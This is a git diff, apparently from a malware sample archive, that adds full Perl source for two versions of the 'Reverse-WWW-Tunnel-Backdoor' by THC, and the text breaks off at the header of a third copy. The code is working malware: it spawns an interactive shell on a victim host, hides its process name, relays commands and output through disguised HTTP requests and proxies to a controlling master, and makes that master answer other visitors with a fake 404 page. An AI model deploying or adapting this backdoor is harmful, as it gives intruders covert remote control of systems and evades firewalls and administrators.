diff --git a/Perl/Backdoor.Perl.AEI.16 b/Perl/Backdoor.Perl.AEI.16
new file mode 100644
index 00000000..64dedf31
--- /dev/null
+++ b/Perl/Backdoor.Perl.AEI.16
@@ -0,0 +1,338 @@
+#
+# Reverse-WWW-Tunnel-Backdoor v1.6
+# (c) 1998 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
+# Check out http://r3wt.base.org for updates
+# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls"
+# available at the website above in the "Articles" section.
+#
+
+# Greets to all THC, ADM, arF and #bluebox guys
+
+# verified to work on Linux, Solaris, AIX and OpenBSD
+
+# BUGS: some Solaris machines: select(3) is broken, won't work there
+#	on some systems Perl's recv is broken :-( (AIX, OpenBSD) ...
+#	we can't make proper receive checks here. Workaround implemented.
+#
+# HISTORY:
+# v1.6: included www-proxy authentication ;-))
+# v1.4: porting to various unix types (and I thought perl'd be portable...)
+# v1.3: initial public release of the paper including this tool
+
+#
+# GENERAL CONFIG (except for $MASK, everything must be the same
+#		  for MASTER and SLAVE is this section!)
+#
+$CGI_PREFIX="/cgi-bin/order?";	# should look like cgi. "?" as last char!
+$MASK="vi";			# for masking the program's process name
+$PASSWORD="THC";		# anything, nothing you have to rememeber
+				# (not a real "password" anyway)
+#
+# MASTER CONFIG (specific for the MASTER)
+#
+$LISTEN_PORT=8080;	# on which port to listen (80 [needs root] or 8080)
+$SERVER="127.0.0.1";	# the host to run on (ip/dns) (the SLAVE needs this!)
+
+#
+# SLAVE CONFIG (specific for the SLAVE)
+#
+$SHELL="/bin/sh -i";	# program to execute (e.g. /bin/sh)
+$DELAY="3";		# time to wait for output after your command(s)
+#$TIME="00:01";		# time when to connect to the master (unset if now)
+#$DAILY="yes";		# tries to connect once daily if set with something
+#$PROXY="127.0.0.1";	# set this with the Proxy if you must use one
+#$PROXY_PORT="3128";	# set this with the Proxy Port if you must use one
+#$PROXY_USER="user";	# username for proxy authentication
+#$PROXY_PASSWORD="pass";	# password for proxy authentication
+#$DEBUG="";		# for debugging purpose, turn off when in production
+$BROKEN_RECV="yes";	# For AIX & OpenBSD, NOT for Linux & Solaris
+
+# END OF CONFIG		# nothing for you to do after this point #
+
+################## BEGIN MAIN CODE ##################
+
+require 5.002;
+use Socket;
+
+$|=1;				# next line changes our process name
+if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";}  $0=$MASK; }
+undef $DAILY   if (! $TIME);
+if ( !($PROXY) || !($PROXY_PORT) ) {
+	undef $PROXY;
+	undef $PROXY_PORT;
+}
+$protocol = getprotobyname('tcp');
+
+if ($ARGV[0] ne "") {
+	if ($ARGV[0] eq "-h") {
+		print STDOUT "no commandline option : daemon mode\n"; 
+		print STDOUT "using \"-h\" as option  : this help\n";
+		print STDOUT "any other option      : slave mode\n";
+		exit(0);
+	} else {
+		print STDOUT "starting in slave mode\n";
+		$SLAVE_MODE = "yeah";
+	}
+}
+
+if (! $SLAVE_MODE) { 
+	&master;
+} else {
+	&slave;
+}
+# END OF MAIN FUNCTION
+
+############### SLAVE FUNCTION ###############
+
+sub slave {
+	$pid = 0;
+	if ($PROXY) {		# setting the real config (for Proxy Support)
+		$REAL_SERVER = $PROXY;
+		$REAL_PORT = $PROXY_PORT;
+		$REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT
+			. $CGI_PREFIX;
+		$PROXY_SUFFIX = "Pragma: no-cache\n";
+		if ( $PROXY_USER && USER_PASSWORD ) {
+			&base64encoding;
+			$PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE;
+		}
+	} else {
+		$REAL_SERVER = $SERVER;
+		$REAL_PORT = $LISTEN_PORT;
+		$REAL_PREFIX = "GET " . $CGI_PREFIX;
+	}
+AGAIN:	if ($pid) { kill 9, $pid; }
+	if ($TIME) {			# wait until the specified $TIME
+		$TIME =~ s/^0//;	$TIME =~ s/:0/:/;
+		(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
+			= localtime(time);
+		$t=$hour . ":" . $min;
+		while ($TIME ne $t) {
+			sleep(28); # every 28 seconds we look at the watch
+			(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
+				= localtime(time);
+			$t=$hour . ":" .$min;
+		}
+	}
+	print STDERR "Slave activated\n"	if $DEBUG;
+	if ($DAILY) {			# if we must connect daily, we'll
+		if (fork) {		# fork the daily shell process to
+			sleep(69);	# ensure the master control process
+			goto AGAIN;	# won't get stuck by a fucking cmd
+		}			# the user executed.
+	print STDERR "forked\n" if $DEBUG;
+	}
+	$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
+	$remote = sockaddr_in($REAL_PORT, $address);
+	$forked = 0;
+GO:	close(THC);
+	socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
+		or die "can't create socket\n";
+	setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
+	if (! $forked) {		# fork failed? fuck, let's try again
+		pipe R_IN, W_IN;        select W_IN;  $|=1;
+		pipe R_OUT, W_OUT;      select W_OUT; $|=1;
+		$pid = fork;
+		if (! defined $pid) {
+			close THC;
+			close R_IN;	close W_IN;
+			close R_OUT;	close W_OUT;
+			goto GO;
+		}
+		$forked = 1;
+	}
+	if (! $pid) {           # this is the child process (execs $SHELL)
+		close R_OUT;	close W_IN;	close THC;
+		print STDERR "forking $SHELL in child\n"	if $DEBUG;
+		open STDIN,  "<&R_IN";
+		open STDOUT, ">&W_OUT";
+		open STDERR, ">&W_OUT";
+		exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
+		close R_IN;     close W_OUT;
+		exit(0);
+	} else {                # this is the parent (data control + network)
+		close R_IN;
+		sleep($DELAY);	# we wait $DELAY for the commands to complete
+		vec($rs, fileno(R_OUT), 1) = 1;
+		print STDERR "before: allwritten2stdin\n"	if $DEBUG;
+		select($r = $rs, undef, undef, 30);
+		print STDERR "after : wait for allwritten2stdin\n" if $DEBUG;
+		sleep(1);	# The following readin of the command output
+		$output = "";	# looks weird. It must be! every system
+		vec($ws, fileno(W_OUT), 1) = 1;     # behaves different :-((
+		print STDERR "before: readwhiledatafromstdout\n"   if $DEBUG;
+		while (select($w = $ws, undef, undef, 1)) {
+			read R_OUT, $readout, 1 || last;
+			$output = $output . $readout;
+		}
+		print STDERR "after : readwhiledatafromstdout\n"   if $DEBUG;
+		print STDERR "before: fucksunprob\n"	if $DEBUG;
+		vec($ws, fileno(W_OUT), 1) = 1;
+		while (! select(undef, $w=$ws, undef, 0.001)) {
+			read R_OUT, $readout, 1 || last;
+			$output = $output . $readout;
+		}
+		print STDERR "after : fucksunprob\n"	if $DEBUG;
+		print STDERR "send 0byte to stdout, fail->exit\n"   if $DEBUG;
+		print W_OUT "\000" || goto ENDE;
+		print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG;
+		while (1) {
+			read R_OUT, $readout, 1 || last;
+			last  if ($readout eq "\000");
+			$output = $output . $readout;
+		}
+		print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG;
+		&uuencode;	# does the encoding of the shell output
+		$encoded = $REAL_PREFIX . $encoded;
+		$encoded = $encoded . $PROXY_SUFFIX	if ($PROXY);
+		$encoded = $encoded . "\n";
+		print STDERR "connecting to remote, fail->exit\n" if $DEBUG;
+		connect(THC, $remote) || goto ENDE;	# connect to master
+		print STDERR "send encoded data, fail->exit\n" if $DEBUG;
+		send (THC, $encoded, 0) || goto ENDE;	# and send data
+		$input = "";
+		vec($rt, fileno(THC), 1) = 1;  # wait until master sends reply
+		print STDERR "before: wait4answerfromremote\n"	if $DEBUG;
+		while (! select($r = $rt, undef, undef, 0.00001)) {}
+		print STDERR "after : wait4answerfromremote\n"	if $DEBUG;
+		print STDERR "read data from socket until eod\n" if $DEBUG;
+		$error="no";
+		while (1) {		# read until EOD (End Of Data)
+			print STDERR "?"	if $DEBUG;
+	# OpenBSD 2.2 can't recv here! can't get any data! sucks ...
+			recv (THC, $readin, 1, 0) || undef $error;
+			if ((! $error) and (! $BROKEN_RECV)) { goto OK; }
+			print STDERR "!"	if $DEBUG;
+			goto OK  if (($readin eq "\000") or ($readin eq "\n")
+				or ($readin eq ""));
+			$input = $input . $readin;
+		}
+OK:		print STDERR "\nall data read, entering OK\n"	if $DEBUG;
+		$input =~ s/\n//gs;
+		&uudecode;		# decoding the data from the master
+		print STDERR "if password not found -> exit\n"	if $DEBUG;
+		goto ENDE  if ( $decoded =~ m/^$PASSWORD/s == 0);
+		$decoded =~ s/^$PASSWORD//;
+		print STDERR "writing input data to $SHELL\n"	if $DEBUG;
+		print W_IN "$decoded" || goto ENDE;	# sending the data
+		sleep(1);				# to the shell proc.
+		print STDERR "jumping to GO\n"	if $DEBUG;
+		goto GO;
+	}
+ENDE:	kill 9, $pid;	$pid = 0;
+	exit(0);
+} # END OF SLAVE FUNCTION
+
+############### MASTER FUNCTION ###############
+
+sub master {
+	socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
+		or die "can't create socket\n";
+	setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
+	bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
+	listen(THC, 3) || die "can't listen\n";		# print the HELP
+	print STDOUT '
+Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ...
+
+Introduction: 	Wait for your SLAVE to connect, examine it\'s output and then
+		type in your commands to execute on SLAVE. You\'ll have to
+		wait min. the set $DELAY seconds before you get the output
+		and can execute the next stuff. Use ";" for multiple commands.
+		Trying to execute interactive commands may give you headache
+		so beware. Your SLAVE may hang until the daily connect try
+		(if set - otherwise you lost).
+		You also shouldn\'t try to view binary data too ;-)
+		"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
+		friends if you don\'t like using vi in a delayed line mode ;-)
+		To exit this program on any time without doing harm to either
+		MASTER or SLAVE just press Control-C.
+		Now have fun.
+';
+
+YOP:	print STDOUT "\nWaiting for connect ...";
+	$remote=accept (S, THC)  ||  goto YOP;		# get the connection
+	($r_port, $r_slave)=sockaddr_in($remote);	# and print the SLAVE
+	$slave=gethostbyaddr($r_slave, AF_INET);	# data.
+	$slave="unresolved" if ($slave eq "");
+	print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
+	select S;	$|=1;
+	select STDOUT;	$|=1;
+	$input = "";
+	vec($socks, fileno(S), 1) = 1;
+	$error="no";
+	while (1) {			# read the data sent by the slave
+		while (! select($r = $socks, undef, undef, 0.00001)) {}
+		recv (S, $readin, 80, 0) || undef $error;
+		if ((! $error) and (! $BROKEN_RECV)) {
+		    print STDOUT "[disconnected]\n";
+		}
+		$readin =~ s/\r//g;
+		$input = $input . $readin;
+		last  if ( $input =~ m/\n\n/s );
+	}
+	&hide_as_broken_webserver  if ( $input =~ m/$CGI_PREFIX/s == 0 );
+	$input =~ s/^.*($CGI_PREFIX)\??//s;
+	$input =~ s/\n.*$//s;
+	&uudecode;		# decoding the data from the slave
+	&hide_as_broken_webserver  if ( $decoded =~ m/^$PASSWORD/s == 0 );
+	$decoded =~ s/^$PASSWORD//s;
+	$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
+	print STDOUT "$decoded";	# showing the slave output to the user
+	$output = <STDIN>;		# and get his input.
+	&uuencode;		# encode the data for the slave
+	send (S, $encoded, 0) || die "\nconnection lost!\n";	# and send it
+	close (S);
+	print STDOUT "sent.\n";
+	goto YOP;		# wait for the next connect from the slave
+} # END OF MASTER FUNCTION
+
+###################### MISC. FUNCTIONS #####################
+
+sub uuencode {	# does the encoding stuff for error-free data transfer via WWW
+	$output = $PASSWORD . $output;		# PW is for error checking and
+        $uuencoded = pack "u", "$output";	# preventing sysadmins from
+        $uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-'	# sending you weird
+                        /'zcadefghjklmnopqrstuv'	# data. No real
+                        /;				# security!
+        $uuencoded =~ tr/"'"/'b'/;
+	if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb
+		$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
+		$cut_length = 4099 - (length $REAL_PREFIX);
+		$uuencoded = pack "a$cut_length", $uuencoded
+			if ($codelength > 4111);
+	}
+        $encoded = $uuencoded;
+	$encoded = $encoded . " HTTP/1.0\n"    if ($SLAVE_MODE);
+} # END OF UUENCODE FUNCTION
+
+sub uudecode {	# does the decoding of the data stream
+	$input =~     tr/'zcadefghjklmnopqrstuv'
+			/'\n)=(:;&><,#$*%]!\@"`\\\-'
+			/;
+	$input =~     tr/'b'/"'"/;
+	$decoded = unpack "u", "$input";
+} # END OF UUDECODE FUNCTION
+
+sub base64encoding {	# does the base64 encoding for proxy passwords
+	$encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD;
+	$encoded_string = substr(pack('u', $encode_string), 1);
+	chomp($encoded_string);
+	$encoded_string =~ tr|` -_|AA-Za-z0-9+/|;
+	$padding = (3 - length($encode_string) % 3) % 3;
+	$encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding;
+	$PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n";
+} # END OF BASE64ENCODING FUNCTION
+
+sub hide_as_broken_webserver {	# invalid request -> look like broken server
+	send (S, "<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>".
+		 "<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n", 0);
+	close S;
+	print STDOUT "Warning! Illegal server access!\n";   # report to user
+	goto YOP;
+} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
+
+# END OF PROGRAM # (c) 1998 by <vh@reptile.rug.ac.be>
+
+
+
+
diff --git a/Perl/Backdoor.Perl.AEI.20 b/Perl/Backdoor.Perl.AEI.20
new file mode 100644
index 00000000..5f55b7f7
--- /dev/null
+++ b/Perl/Backdoor.Perl.AEI.20
@@ -0,0 +1,366 @@
+#
+# Reverse-WWW-Tunnel-Backdoor v2.0
+# (c) 1998-2002 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
+# Check out http://www.thehackerschoice.com
+# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls"
+# available at the website above in the "Articles" section.
+#
+
+# Greets to all THC, TESO, ADM and #bluebox guys
+
+# verified to work on Linux, Solaris, AIX and OpenBSD
+
+# BUGS: some Solaris machines: select(3) is broken, won't work there
+#	on some systems Perl's recv is broken :-( (AIX, OpenBSD) ...
+#	we can't make proper receive checks here. Workaround implemented.
+#
+# HISTORY:
+# v2.0: HTTP 1.0 protocol compliance (finally ;-)
+# v1.6: included www-proxy authentication ;-))
+# v1.4: porting to various unix types (and I thought perl'd be portable...)
+# v1.3: initial public release of the paper including this tool
+
+#
+# GENERAL CONFIG (except for $MASK, everything must be the same
+#		  for MASTER and SLAVE is this section!)
+#
+$MODE="POST";			 # GET or POST
+$CGI_PREFIX="/cgi-bin/orderform";# should look like a valid cgi.
+$MASK="vi";			 # for masking the program's process name
+$PASSWORD="THC";		 # anything, nothing you have to rememeber
+				 # (not a real "password" anyway)
+#
+# MASTER CONFIG (specific for the MASTER)
+#
+$LISTEN_PORT=8080;	# on which port to listen (80 [needs root] or 8080)
+$SERVER="127.0.0.1";	# the host to run on (ip/dns) (the SLAVE needs this!)
+
+#
+# SLAVE CONFIG (specific for the SLAVE)
+#
+$SHELL="/bin/sh -i";	# program to execute (e.g. /bin/sh)
+$DELAY="3";		# time to wait for output after your command(s)
+#$TIME="14:39";		# time when to connect to the master (unset if now)
+#$DAILY="yes";		# tries to connect once daily if set with something
+#$PROXY="127.0.0.1";	# set this with the Proxy if you must use one
+#$PROXY_PORT="3128";	# set this with the Proxy Port if you must use one
+#$PROXY_USER="user";	# username for proxy authentication
+#$PROXY_PASSWORD="pass";# password for proxy authentication
+#$DEBUG="yes";		# for debugging purpose, turn off when in production
+$BROKEN_RECV="yes";	# For AIX & OpenBSD, NOT for Linux & Solaris
+
+# END OF CONFIG		# nothing for you to do after this point #
+
+################## BEGIN MAIN CODE ##################
+
+require 5.002;
+use Socket;
+
+$|=1;				# next line changes our process name
+if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";}  $0=$MASK; }
+undef $DAILY   if (! $TIME);
+if ( !($PROXY) || !($PROXY_PORT) ) {
+	undef $PROXY;
+	undef $PROXY_PORT;
+}
+$protocol = getprotobyname('tcp');
+
+if ($ARGV[0] ne "slave" && $ARGV[0] ne "daemon" && $ARGV[0] ne "master" && $ARGV[1] eq "") {
+	print STDOUT "Proof-of-Concept Program for the paper \"Placing Backdoors through Firewalls\"\navailable at http://www.thehackerschoice.com in the \"Articles\" section.\n";
+	print STDOUT "Commandline options for rwwwshell:\n\tmaster\t- master mode\n\tslave\t- slave mode\n";
+	exit(0);
+}
+
+if ($ARGV[0] eq "slave") {
+	print STDOUT "starting in slave mode\n";
+	$SLAVE_MODE = "yeah";
+}
+
+# check for a correct mode
+if ($MODE ne "GET" && $MODE ne "POST") {
+	print STDOUT "Error: MODE must either be GET or POST, re-edit this perl config\n";
+	exit(-1);
+}
+
+if (! $SLAVE_MODE) { 
+	&master;
+} else {
+	&slave;
+}
+# END OF MAIN FUNCTION
+
+############### SLAVE FUNCTION ###############
+
+sub slave {
+	$pid = 0;
+	$PROXY_SUFFIX = "Host: " . $SERVER . "\r\nUser-Agent: Mozilla/4.0\r\nAccept: text/html, text/plain, image/jpeg, image/*;\r\nAccept-Language: en\r\n";
+	if ($PROXY) {		# setting the real config (for Proxy Support)
+		$REAL_SERVER = $PROXY;
+		$REAL_PORT = $PROXY_PORT;
+		$REAL_PREFIX = $MODE . " http://" . $SERVER . ":" . $LISTEN_PORT
+			. $CGI_PREFIX;
+		$PROXY_SUFFIX = $PROXY_SUFFIX . "Pragma: no-cache\r\n";
+		if ( $PROXY_USER && USER_PASSWORD ) {
+			&base64encoding;
+			$PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE;
+		}
+	} else {
+		$REAL_SERVER = $SERVER;
+		$REAL_PORT = $LISTEN_PORT;
+		$REAL_PREFIX = $MODE . " " . $CGI_PREFIX;
+	}
+	$REAL_PREFIX = $REAL_PREFIX . "?"	if ($MODE eq "GET");
+	$REAL_PREFIX = $REAL_PREFIX . " HTTP/1.0\r\n"	if ($MODE eq "POST");
+AGAIN:	if ($pid) { kill 9, $pid; }
+	if ($TIME) {			# wait until the specified $TIME
+		$TIME =~ s/^0//;	$TIME =~ s/:0/:/;
+		(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
+			= localtime(time);
+		$t=$hour . ":" . $min;
+		while ($TIME ne $t) {
+			sleep(28); # every 28 seconds we look at the watch
+			(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
+				= localtime(time);
+			$t=$hour . ":" .$min;
+		}
+	}
+	print STDERR "Slave activated\n"	if $DEBUG;
+	if ($DAILY) {			# if we must connect daily, we'll
+		if (fork) {		# fork the daily shell process to
+			sleep(69);	# ensure the master control process
+			goto AGAIN;	# won't get stuck by a fucking cmd
+		}			# the user executed.
+	print STDERR "forked\n" if $DEBUG;
+	}
+	$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
+	$remote = sockaddr_in($REAL_PORT, $address);
+	$forked = 0;
+GO:	close(THC);
+	socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
+		or die "can't create socket\n";
+	setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
+	if (! $forked) {		# fork failed? fuck, let's try again
+		pipe R_IN, W_IN;        select W_IN;  $|=1;
+		pipe R_OUT, W_OUT;      select W_OUT; $|=1;
+		$pid = fork;
+		if (! defined $pid) {
+			close THC;
+			close R_IN;	close W_IN;
+			close R_OUT;	close W_OUT;
+			goto GO;
+		}
+		$forked = 1;
+	}
+	if (! $pid) {           # this is the child process (execs $SHELL)
+		close R_OUT;	close W_IN;	close THC;
+		print STDERR "forking $SHELL in child\n"	if $DEBUG;
+		open STDIN,  "<&R_IN";
+		open STDOUT, ">&W_OUT";
+		open STDERR, ">&W_OUT";
+		exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
+		close R_IN;     close W_OUT;
+		exit(0);
+	} else {                # this is the parent (data control + network)
+		close R_IN;
+		sleep($DELAY);	# we wait $DELAY for the commands to complete
+		vec($rs, fileno(R_OUT), 1) = 1;
+		print STDERR "before: allwritten2stdin\n"	if $DEBUG;
+		select($r = $rs, undef, undef, 30);
+		print STDERR "after : wait for allwritten2stdin\n" if $DEBUG;
+		sleep(1);	# The following readin of the command output
+		$output = "";	# looks weird. It must be! every system
+		vec($ws, fileno(W_OUT), 1) = 1;     # behaves different :-((
+		print STDERR "before: readwhiledatafromstdout\n"   if $DEBUG;
+		while (select($w = $ws, undef, undef, 1)) {
+			read R_OUT, $readout, 1 || last;
+			$output = $output . $readout;
+		}
+		print STDERR "after : readwhiledatafromstdout\n"   if $DEBUG;
+		print STDERR "before: fucksunprob\n"	if $DEBUG;
+		vec($ws, fileno(W_OUT), 1) = 1;
+		while (! select(undef, $w=$ws, undef, 0.001)) {
+			read R_OUT, $readout, 1 || last;
+			$output = $output . $readout;
+		}
+		print STDERR "after : fucksunprob\n"	if $DEBUG;
+		print STDERR "send 0byte to stdout, fail->exit\n"   if $DEBUG;
+		print W_OUT "\000" || goto END_IT;
+		print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG;
+		while (1) {
+			read R_OUT, $readout, 1 || last;
+			last  if ($readout eq "\000");
+			$output = $output . $readout;
+		}
+		print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG;
+		&uuencode;	# does the encoding of the shell output
+		if ($MODE eq "GET") {
+			$encoded = $REAL_PREFIX . $encoded . " HTTP/1.0\r\n";
+			$encoded = $encoded . $PROXY_SUFFIX;
+			$encoded = $encoded . "\r\n";
+		} else {	# $MODE is "POST"
+			$encoded = $REAL_PREFIX . $PROXY_SUFFIX
+			 . "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
+			 . $encoded . "\r\n";
+		}
+		print STDERR "connecting to remote, fail->exit\n" if $DEBUG;
+		connect(THC, $remote) || goto END_IT;	# connect to master
+		print STDERR "send encoded data, fail->exit\n" if $DEBUG;
+		send (THC, $encoded, 0) || goto END_IT;	# and send data
+		$input = "";
+		vec($rt, fileno(THC), 1) = 1;  # wait until master sends reply
+		print STDERR "before: wait4answerfromremote\n"	if $DEBUG;
+		while (! select($r = $rt, undef, undef, 0.00001)) {}
+		print STDERR "after : wait4answerfromremote\n"	if $DEBUG;
+		print STDERR "read data from socket until eod\n" if $DEBUG;
+		$error="no";
+#		while (1) {		# read until EOD (End Of Data)
+			print STDERR "?"	if $DEBUG;
+	# OpenBSD 2.2 can't recv here! can't get any data! sucks ...
+			recv (THC, $readin, 16386, 0) || undef $error;
+#			if ((! $error) and (! $BROKEN_RECV)) { goto OK; }
+			print STDERR "!"	if $DEBUG;
+			goto OK  if (($readin eq "\000") or ($readin eq "\n")
+				or ($readin eq ""));
+			$input = $input . $readin;
+#		}
+OK:		print STDERR "\nall data read, entering OK\n"	if $DEBUG;
+		print STDERR "RECEIVE: $input\n"	if $DEBUG;
+		$input =~ s/.*\r\n\r\n//s;
+		print STDERR "BEFORE DECODING: $input\n"	if $DEBUG;
+		&uudecode;		# decoding the data from the master
+		print STDERR "AFTER DECODING: $decoded\n"	if $DEBUG;
+		print STDERR "if password not found -> exit\n"	if $DEBUG;
+		goto END_IT	if ($decoded =~ m/^$PASSWORD/s == 0);
+		$decoded =~ s/^$PASSWORD//;
+		print STDERR "writing input data to $SHELL\n"	if $DEBUG;
+		print W_IN "$decoded" || goto END_IT;	# sending the data
+		sleep(1);				# to the shell proc.
+		print STDERR "jumping to GO\n"	if $DEBUG;
+		goto GO;
+	}
+END_IT:	kill 9, $pid;	$pid = 0;
+	exit(0);
+} # END OF SLAVE FUNCTION
+
+############### MASTER FUNCTION ###############
+
+sub master {
+	socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
+		or die "can't create socket\n";
+	setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
+	bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
+	listen(THC, 3) || die "can't listen\n";		# print the HELP
+	print STDOUT '
+Welcome to the Reverse-WWW-Tunnel-Backdoor v2.0 by van Hauser / THC ...
+
+Introduction: 	Wait for your SLAVE to connect, examine it\'s output and then
+		type in your commands to execute on SLAVE. You\'ll have to
+		wait min. the set $DELAY seconds before you get the output
+		and can execute the next stuff. Use ";" for multiple commands.
+		Trying to execute interactive commands may give you headache
+		so beware. Your SLAVE may hang until the daily connect try
+		(if set - otherwise you lost).
+		You also shouldn\'t try to view binary data too ;-)
+		"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
+		friends if you don\'t like using vi in a delayed line mode ;-)
+		To exit this program on any time without doing harm to either
+		MASTER or SLAVE just press Control-C.
+		Now have fun.
+';
+
+YOP:	print STDOUT "\nWaiting for connect ...";
+	$remote=accept (S, THC)  ||  goto YOP;		# get the connection
+	($r_port, $r_slave)=sockaddr_in($remote);	# and print the SLAVE
+	$slave=gethostbyaddr($r_slave, AF_INET);	# data.
+	$slave="unresolved" if ($slave eq "");
+	print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
+	select S;	$|=1;
+	select STDOUT;	$|=1;
+	$input = "";
+	vec($socks, fileno(S), 1) = 1;
+	$error="no";
+#	while (1) {			# read the data sent by the slave
+		while (! select($r = $socks, undef, undef, 0.00001)) {}
+		recv (S, $readin, 16386, 0) || undef $error;
+		if ((! $error) and (! $BROKEN_RECV)) {
+		    print STDOUT "[disconnected]\n";
+		}
+#		$readin =~ s/\r//g;
+#		$input = $input . $readin;
+#		last  if ( $input =~ m/\r\n\r\n/s );
+		$input = $readin;
+		print STDERR "MASTER RECEIVE: $input\n"	if $DEBUG;
+#	}
+	&hide_as_broken_webserver  if ( $input =~ m/$CGI_PREFIX/s == 0 );
+	if ( $input =~ m/^GET /s ) {
+		$input =~ s/^.*($CGI_PREFIX)\??//s;
+		$input =~ s/\r\n.*$//s;
+	} else { if ( $input =~ m/^POST /s ) {
+		$input =~ s/^.*\r\n\r\n//s;
+	} else { if ( $input =~ m/^HEAD /s ) {
+		&hide_as_broken_webserver;
+	} else {
+		close S;
+		print STDOUT "Warning! Illegal server access!\n";   # report to user
+		goto YOP;
+	} } }
+	print STDERR "BEFORE DECODING: $input\n"	if $DEBUG;
+	&uudecode;		# decoding the data from the slave
+	&hide_as_broken_webserver  if ( $decoded =~ m/^$PASSWORD/s == 0 );
+	$decoded =~ s/^$PASSWORD//s;
+	$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
+	print STDOUT "$decoded";	# showing the slave output to the user
+	$output = <STDIN>;		# and get his input.
+	&uuencode;		# encode the data for the slave
+	$encoded = "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/plain\r\n\r\n" . $encoded . "\r\n";
+	send (S, $encoded, 0) || die "\nconnection lost!\n";	# and send it
+	close (S);
+	print STDOUT "sent.\n";
+	goto YOP;		# wait for the next connect from the slave
+} # END OF MASTER FUNCTION
+
+###################### MISC. FUNCTIONS #####################
+
+sub uuencode {	# does the encoding stuff for error-free data transfer via WWW
+	$output = $PASSWORD . $output;		# PW is for error checking and
+        $uuencoded = pack "u", "$output";	# preventing sysadmins from
+        $uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-'	# sending you weird
+                        /'zcadefghjklmnopqrstuv'	# data. No real
+                        /;				# security!
+        $uuencoded =~ tr/"'"/'b'/;
+	if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb
+		$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
+		$cut_length = 4099 - (length $REAL_PREFIX);
+		$uuencoded = pack "a$cut_length", $uuencoded
+			if ($codelength > 4111);
+	}
+        $encoded = $uuencoded;
+} # END OF UUENCODE FUNCTION
+
+sub uudecode {	# does the decoding of the data stream
+	$input =~     tr/'zcadefghjklmnopqrstuv'
+			/'\n)=(:;&><,#$*%]!\@"`\\\-'
+			/;
+	$input =~     tr/'b'/"'"/;
+	$decoded = unpack "u", "$input";
+} # END OF UUDECODE FUNCTION
+
+sub base64encoding {	# does the base64 encoding for proxy passwords
+	$encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD;
+	$encoded_string = substr(pack('u', $encode_string), 1);
+	chomp($encoded_string);
+	$encoded_string =~ tr|` -_|AA-Za-z0-9+/|;
+	$padding = (3 - length($encode_string) % 3) % 3;
+	$encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding;
+	$PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n";
+} # END OF BASE64ENCODING FUNCTION
+
+sub hide_as_broken_webserver {	# invalid request -> look like broken server
+	send (S, "<HTML><HEAD>\r\n<TITLE>404 File Not Found</TITLE>\r\n</HEAD>".
+		 "<BODY>\r\n<H1>File Not Found</H1>\r\n</BODY></HTML>\r\n", 0);
+	close S;
+	print STDOUT "Warning! Illegal server access!\n";   # report to user
+	goto YOP;
+} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
+
+# END OF PROGRAM # (c) 1998-2002 by <vh@reptile.rug.ac.be>
diff --git a/Perl/Backdoor.Perl.AEI.a b/Perl/Backdoor.Perl.AEI.a
new file mode 100644
index 00000000..71c5262f
--- /dev/null
+++ b/Perl/Backdoor.Perl.AEI.a
@@ -0,0 +1,334 @@
+#
+# Reverse-WWW-Tunnel-Backdoor v1.6
+# (c) 1998 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
+# Check out http://r3wt.base.org for updates
+# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls"
